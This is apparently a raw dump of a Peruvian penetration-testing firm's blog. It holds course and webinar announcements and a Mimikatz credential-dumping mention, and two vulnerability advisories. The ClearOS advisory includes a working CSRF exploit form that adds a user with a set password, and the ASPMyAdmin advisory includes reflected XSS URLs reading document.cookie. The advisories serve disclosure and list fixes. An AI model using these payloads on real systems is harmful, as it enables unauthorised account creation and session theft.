<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG2CXAEtddxBmjtpNE9DMSuQBwmjQ7DG4SpPFiQQq6QqDbjAXWYR5BIv3q40qm6hYoVe1I1BXHqrLa-k9pTHpk7AVHoAp2Pjbp3mSCpjOxF9k9UmIaGQEPAgXn9Ur3zxL4mvNEK1FeA8WF/s1600/mimikatz3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG2CXAEtddxBmjtpNE9DMSuQBwmjQ7DG4SpPFiQQq6QqDbjAXWYR5BIv3q40qm6hYoVe1I1BXHqrLa-k9pTHpk7AVHoAp2Pjbp3mSCpjOxF9k9UmIaGQEPAgXn9Ur3zxL4mvNEK1FeA8WF/s400/mimikatz3.png" /></a></div>
<center>
Enumeración de hashes y claves en texto plano del usuario Administrador</center>
<br/>
<br>
<p align="justify">
<b>Herramientas utilizadas:<br></b>
Mimikatz: http://blog.gentilkiwi.com/securite/mimikatz/minidump<br>
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx<br>
<br>
<p align="justify">
No aplicar este material ni conocimientos sin el consentimiento explícito que autorice a hacerlo.(<a target="_blank" href="http://pastebin.com/m8rLrSE8">leer descargo de responsabilidades</a>)
</p>
<br><br><br>Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-1142420473059173802.post-84697665614746043382013-05-11T15:21:00.001-05:002013-05-11T15:26:31.639-05:00OSEH @ 2013 : Una nueva oportunidad !<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRML74ZlPla9_8yekLSmlmECWIAo-nLAOXgGg8dIl8fwp3ncseb1-LiM1D8Tt-WxSL_lFVtZHExc1B-FxoATz82mligIbb-IRMMm8_blAgjUM0ttyy5Un6xRXpmbr5GsDFqgriUhKm5HU/s1600/OSEH-Transparent.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRML74ZlPla9_8yekLSmlmECWIAo-nLAOXgGg8dIl8fwp3ncseb1-LiM1D8Tt-WxSL_lFVtZHExc1B-FxoATz82mligIbb-IRMMm8_blAgjUM0ttyy5Un6xRXpmbr5GsDFqgriUhKm5HU/s320/OSEH-Transparent.png" width="320" /></a></div>
A menudo escriben a consultarnos sobre la apertura del Open Sec Ethical Hacker (OSEH) debido a que ya son conocidas las expectativas que este curso genera, por lo tanto, les comunicamos que la fecha esta fijada para los días 21, 22 y 23 de Junio. Este curso solo se dicta al público en general 1 vez al año, así que, no pierdan esta gran oportunidad.<br />
<br />
Es común, en estos días, recibir una serie de correos enviando información sobre cursos y seminarios de los cuales no se tiene mucha información, todos prometen el oro y el moro. Es ahí donde tomas la decisión de asistir, finalmente, llevándote una gran decepción (en la mayoría de los casos), donde perdiste tiempo, dinero y sobre todo las cosas que antes conocías poco o tal vez nada, ahora no han quedado claras o, peor aún, te llevas una idea errónea de las cosas.<br />
<br />
Que nos diferencia de los demás? Somos PROFESIONALES que formamos un equipo de consultores llamado OPEN SEC quienes día a día comprobamos y explotamos en clientes diversas vulnerabilidades de diversos fabricantes. Nosotros compartimos nuestras experiencias en el curso (OSEH) de una manera 100% práctica, donde al finalizar el curso conocerás los errores más comunes que se pueden cometer, así como evaluar tu propia aplicación web, tu propia infraestructura y así buscar soluciones para estar a buen recaudo.<br />
<br />
<br />
Finalmente, Oscar Martinez, Magister en Ciencias de la Computación, una de las personas con más amplios conocimientos a nivel nacional en seguridad informática, Ethical Hacking y Pentesting, así como certificados que avalan sus conocimientos, ha publicado en su blog una comparativa interesante sobre los cursos de Ethical Hacking y pentesting. Sí te queda alguna duda sobre qué curso debes elegir, te recomendamos despejes esas dudas <a href="http://fiery-owl.blogspot.com/2013/04/evaluando-los-cursos-de-ehpt.html" target="_blank">aquí</a>.</div>
Open-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.com3tag:blogger.com,1999:blog-1142420473059173802.post-13432434555740448462013-01-11T22:15:00.000-05:002013-02-23T23:28:56.116-05:00Advisory CSRF-ClearOS 10012013<br />
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Advisory
ID:</b> OS002</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Product</b>:
<span style="color: #c5000b;">ClearOS</span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Created
by</b>: Clear Foundation
(http://www.clearfoundation.com/Foundation/core-team-honor-roll.html)</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Vulnerable
Version(s)</b>: 6.X.X</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Tested
Version</b>: 6.1.0 - 6.3.0 </span>
</div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Vulnerability
Type: Cross-Site Request Forgery (CSRF) [CWE-352]</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Public
Disclosure : No yet</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Vendor
status : Notified</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Vendor
Answer : "We expect these to be resolved for the ClearOS 6.4.0
Beta 2 (due later this month)."</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>CVSS
Base Score: 5.8</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>CVSS
Temporal Score: 4.8</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>CVSS
Environmental Score: 4.8</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #004586;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Researcher:
Camilo Galdos, Security Consultant @ Open-sec (
http://www.open-sec.com/ )</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Advisory
Details</b> :</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">Camilo
Galdos, Security Consultant at Open-Sec discovered a vulnerability in
ClearOS, which can be exploited to remotely add accounts to the
ClearOS system by making the Administrator access a link.</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Vulnerability
Description: Cross-Site Request Forgery (CSRF) in ClearOS:</b></span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">90%
of the forms in ClearOS and Modules do not use a Token to correctly
verify if the form is being send by the administrator or user in
ClearOS.</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
</div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Examples
of URLs that lead to exploit this vulnerability are</b>:</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">https://127.0.0.1:81/app/users/edit/get</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">POST:</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i>user_info%5Bcore%5D%5Busername%5D=get&user_info%5Bcore%5D%5Bfirst_name%5D=Get&user_info%5Bcore%5D%5Blast_name%5D=ClearOS&password=clear&verify=clear&user_info%5Bplugins%5D%5Bftp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bopenvpn%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bpptpd%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bprint_server%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bsmtp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Buser_certificates%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=0&user_info%5Bextensions%5D%5Bshell%5D%5Blogin_shell%5D=%2Fsbin%2Fnologin&submit=Update</i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">https://127.0.0.1:81/app/users/add</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">POST:</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i>user_info%5Bcore%5D%5Busername%5D=usernametest&user_info%5Bcore%5D%5Bfirst_name%5D=firstnametest&user_info%5Bcore%5D%5Blast_name%5D=lastnametest&password=l0l123&verify=l0l123&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=1&submit=Add</i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Exploit</b>:</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><html></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><title>CSRF
ClearOS</title></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><h1>CSRF
ClearOS ~ Open-Sec</h1></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><form
name="lol" id="lol" class="theme-form"
action="https://192.168.1.40:81/app/users/add"
method="post" accept-charset="utf-8"
autocomplete="off"></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><input
type="hidden" name="user_info[core][username]"
value="Dedalo"/></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><input
type="hidden" name="user_info[core][first_name]"
value="Camilo"/></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><input
type="hidden" name="user_info[core][last_name]"
value="Galdos"/></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><input
type="hidden" name="password" value="p455w0rd"/></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><input
type="hidden" name="verify" value="p455w0rd"/></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><input
type="submit" name="submit" value="Add"/></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i></form></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i></html></i></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<b style="color: #c5000b; font-family: 'Trebuchet MS', sans-serif;">Impact</b><span style="color: #c5000b; font-family: 'Trebuchet MS', sans-serif;">:
Administrators can be scammed to visit a link and when they visit it
they automaticaly create a new user or edit a user or change a
password or anything that is in a form because almost no form has a
token to validate.</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="color: #004586;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Solution</b>:</span></span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">To
fix this kind of vulnerability (CSRF) you must put an authentication
token in every form to validate that the form is being sent from an
specified module or page. Owasp have different examples in different
Programming Languages so you can take one in example to patch this
vulnerability.</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Contact
Information</b>: For additional details, feel free to contact Camilo
Galdos at cgaldos[at]open-sec.com</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<b style="color: #004586; font-family: 'Trebuchet MS', sans-serif;">About Open-Sec:</b></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">Open-Sec
is a Perú based company focused on penetration testing and security
incidents investigation services. With customers at Perú, Ecuador,
Panamá and Honduras, Open-Sec provides consulting services through a
team of certified and experienced consultants.</span></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" lang="en-US" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">Disclaimer:
The information provided in this Advisory is provided "as is"
and without any warranty of any kind. Details of this Advisory may be
updated in order to provide as accurate information as possible. </span>
</div>
Anonymousnoreply@blogger.com2tag:blogger.com,1999:blog-1142420473059173802.post-70674302194742590212012-10-29T22:22:00.003-05:002012-10-29T22:51:35.466-05:00Advisory XSS-ASPMyAdmin 10102012<br />
<div style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Advisory
ID:</b> OS001</span></div>
<div style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /><b>Product:</b>
<span style="color: #c5000b;"><b>ASPmyAdmin</b></span></span></div>
<div style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Created
by:</b> Sukalyan Chakraborty<br /><b>Vulnerable Version(s):</b>
NA<br /><b>Tested Version:</b> NA</span></div>
<div style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /><span style="color: #c5000b;"><b>Vulnerability
Type: Reflected Cross-Site Scripting [CWE-712]</b></span></span></div>
<div style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Public
Disclosure: October 10, 2012 </b></span></span>
</div>
<div style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>Vendor
status : Notified</b></span></span><span style="font-family: Trebuchet MS, sans-serif;"><br /></span><span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>CVSS
Base Score :5.8 </b></span></span>
</div>
<div style="margin-bottom: 0cm;">
<span style="color: #c5000b;"><span style="font-family: Trebuchet MS, sans-serif;"><b>CVSS
Temporal Score 5.8 </b></span></span>
</div>
<div style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><span style="color: #c5000b;"><b>CVSS
Environmental Score 7.5</b></span></span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><span style="color: #004586;"><b>Researcher:
Alfredo García, Senior Security Consultant @ Open-sec (
http://www.open-sec.com/ )</b></span><br /><br /><b>Advisory Details :</b></span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><br />Alfredo
García, Senior Security Consultant at Open-Sec discovered a
vulnerability in ASPmyAdmin, which can be exploited to perform
Multiple Cross-Site Scripting (XSS) and arbitrary HTML injection
attacks.<br /><br /><span style="color: #c5000b;"><b>Vulnerability Description :
Multiple Cross-Site Scripting (XSS) in ASPmyAdmin:</b></span> </span>
</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">ASPMyAdmin
includes ASP scripts that fail to adequately sanitize output strings
coming from user-supplied input . By leveraging this issue, an
attacker may be able inject arbitrary HTML and Javascript code to be
executed in a user's browser within the security context of the
affected victim. </span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">At
least, the following scripts are vulnerable using the dbName
parameter through GET :</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">db_info.asp</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">db_table.asp</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">db_view.asp</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">db_procedure.asp</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">db_sql.asp</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">db_drop.asp</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">Examples
of URLs that lead to exploit this vulnerability are :</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><br />http://www.host.com/db_table.asp?dbName=<script>alert(document.cookie)</script></span></div>
<div style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;">http://www.host.com/db_procedure.asp?dbName=<script>window.alert('Open-Sec')</script></span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<a href="http://www.blogger.com/blogger.g?blogID=1142420473059173802" name="result_box"></a><span style="font-family: Trebuchet MS, sans-serif;"><span style="color: #c5000b;"><b>Impact
:</b></span><span style="color: #c5000b;"> Victims are exposed to unwanted
content, modified content, redirection to other site and/or content,
user's session cookies stealing, browser-based attacks,
etc.</span><br /><br /><span style="color: #004586;"><b>Solution:</b></span><br /><br /><span lang="en">To
fix this kind of vulnerability (XSS), you colud establish a web
application firewall, but, actually, you must validate all output
strings. You must validate that the output is the type, length and
format are the expected ones. For more information on prevention,
visit
:https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet</span></span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<a href="http://www.blogger.com/blogger.g?blogID=1142420473059173802" name="result_box1"></a>
<span style="font-family: Trebuchet MS, sans-serif;">Also,
check out the following link to implement web application security
based on
ESAPI<br /><a href="https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API">https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API</a></span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /><b>Contact
Information :</b> For additional details, feel free to contact
Alfredo Garcia at <a href="mailto:agarcia@open-sec.com">agarcia@open-sec.com</a></span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><b><br /></b></span>
<span style="color: #004586; font-family: Trebuchet MS, sans-serif;"><b>About Open-Sec :</b></span><b style="font-family: 'Trebuchet MS', sans-serif;"> </b><br />
<b style="font-family: 'Trebuchet MS', sans-serif;"><br /></b></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.open-sec.com/" target="_blank">Open-Sec</a>
is a Perú based company focused on penetration testing and security
incidents investigation services. With customers at Perú, Ecuador,
Panamá and Honduras, Open-Sec provides consulting services through a
team of certified and experienced consultants.</span></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<br /></div>
<div align="JUSTIFY" style="margin-bottom: 0cm;">
<span style="font-family: Trebuchet MS, sans-serif;"><i><b>Disclaimer:</b></i>
The information provided in this Advisory is provided "as is"
and without any warranty of any kind. Details of this Advisory may be
updated in order to provide as accurate information as possible. </span>
</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-90262281435765145892012-10-09T21:43:00.000-05:002012-10-13T10:32:59.321-05:00Webminar : Implantación y certificación de la norma PCI DSS<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-chMwl_hjbeI/UHTglP3W53I/AAAAAAAAAHQ/ty744lfII0A/s1600/300x500_fitbox-pci_home_tab.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="http://1.bp.blogspot.com/-chMwl_hjbeI/UHTglP3W53I/AAAAAAAAAHQ/ty744lfII0A/s200/300x500_fitbox-pci_home_tab.jpg" width="200" /></a></div>
<br />
<br />
<a href="http://www.open-sec.com/" target="_blank">Open-Sec</a> , en alianza con <a href="http://www.isecauditors.com/" target="_blank">Internet Security Auditors</a> tiene el agrado de invitarlos al webminar "Implantación y certificación de la norma PCI DSS"<br />
<br />
Instituciones y organizaciones que almacenen, procesen y/o transmitan información de titulares de tarjetas, debe cumplir la norma PCI DSS, para evitar fraudes o robos de información confidencial. El webminar tiene como objetivo brindar el marco general de la norma, el proceso de implementación y su posterior certificación.<br />
<br />
A continuación los detalles de la charla:<br />
<br />
<b>Horario</b><br />
23 de octubre de 2012, 10:00 a.m. Lima (17:00 CET) - 11:30 a.m.
Lima (18:30 CET)<br />
<br />
<b>Temario</b><br />
<br />
10:00 Bienvenida al webinar<br />
10:05 Introducción a PCI DSS <br />
i) ¿Qué es PCI DSS?<br />
ii) Otras Normas PCI: PA-DSS, P2PE, PTS<br />
iii) Aplicabilidad<br />
iv) Programas de Cumplimiento de las Marcas<br />
10:25 Implantación PCI DSS (40 minutos)<br />
i) Proceso de Implantación<br />
ii) Ámbito de Cumplimiento (Scope)<br />
iii) Técnicas de reducción del Ámbito<br />
a. Eliminación<br />
b. Segmentación <br />
c. Tokenización<br />
d. P2PE<br />
11:00 Certificación PCI DSS<br />
i) Proceso de auditoría<br />
ii) Mantenimiento de la certificación<br />
11:15 Turno de preguntas<br />
11:30 Fin del webinar<br />
<br />
<b>Ponente</b><br />
Miguel Ángel Domínguez<br />
<br />
<b>Biografía:</b> <br />
Miguel Ángel Domínguez es socio y co-fundador de Internet Security
Auditors, y dirige el departamento de Consultoría que lidera los
proyectos de implantación de la norma PCI DSS. Ha desarrollado su
carrera profesional en el ámbito de la auditoría y la consultoría
de seguridad de sistemas de información, colaborando en la
metodología OSSTMM que se ha convertido en estándar de auditoría
para pentesting. Está certificado PCI QSA, PA QSA, CISA, CISSP,
ISO27001 Lead Auditor Instructor, CGEIT, SBCI y OPST. Es
Licenciado en Ingeniería Informática por la Universidad Autónoma
de Barcelona y Máster en Seguridad TI y Comercio Electrónico por
La Salle.<br />
<br />
Para registrarse al evento , escribir a : <a href="mailto:info@open-sec.com" needshandler="needsHandler">info@open-sec.c<wbr></wbr>om</a><br />
<br />Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-42941185642043218282012-09-14T11:42:00.000-05:002012-09-16T15:09:42.338-05:00Meses de eventos internacionales para Open-Sec<br />
<div class="Default">
<span style="font-family: "Arial","sans-serif";">A pesar de la
dinámica del día a día de los proyectos y nuestra constante falta de tiempo,
siempre tratamos de participar en eventos, a los cuales tenemos el gusto y
honor de ser invitados.</span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;"><o:p></o:p></span></div>
<div class="Default">
<br /></div>
<span style="font-family: "Arial","sans-serif"; font-size: 12.0pt; mso-ansi-language: #03FF; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Sin embargo este mes en particular nos ha tocado
una agenda bastante interesante, en cuanto a participación a eventos se
refiere, ya que en esta
oportunidad, nos toca
tener presencia fuera de nuestras fronteras e inclusive, en
el continente vecino.</span><br />
<span style="font-family: "Arial","sans-serif"; font-size: 12.0pt; mso-ansi-language: #03FF; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"><br /></span>
<br />
<div class="Default">
<b><span style="font-family: "Arial","sans-serif";"><a href="http://www.campus-party.com.ec/2012/inicio.html" target="_blank">CAMPUS PARTY QUITO 2012</a></span></b><span style="font-family: "Arial","sans-serif";"><o:p></o:p></span></div>
<div class="Default">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-7FAHrqm56BE/UFNcmE4CzeI/AAAAAAAAAGo/ceStWcdCJQc/s1600/elevento1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="http://3.bp.blogspot.com/-7FAHrqm56BE/UFNcmE4CzeI/AAAAAAAAAGo/ceStWcdCJQc/s320/elevento1.jpg" width="320" /></a></div>
<div class="Default">
<b><br /></b></div>
<div class="Default">
<b><br /></b></div>
<div class="Default">
<b><span style="font-family: "Arial","sans-serif";"><br /></span></b></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">Campus Party
Quito 2012 se realizará del 19 al 23 de septiembre en el Centro de
Exposiciones y Convenciones Mitad del
Mundo, Cemexpo, donde se darán cita campuseros de todos los rincones del país.<o:p></o:p></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">Cabe señalar
que Campus Party es el acontecimiento de Internet mas importante del mundo en
las áreas de Innovación, Creatividad, Ciencia y Ocio Digita y se desarrolla
actualmente en mas de 8 Países alrededor del Mundo.<o:p></o:p></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">El evento
espera recibir a más de 2,500 personas, y
contará con charlas y exposiciones sobre
ciencia, cultura digital, innovación, desarrollo de video juegos, entre
otros.<o:p></o:p></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">En esta
oportunidad Open-Sec participará en el área
de <a href="http://www.campus-party.com.ec/2012/seguridad-y-redes.html" target="_blank">Seguridad y Redes</a> con dos charlas:<o:p></o:p></span></div>
<div class="Default">
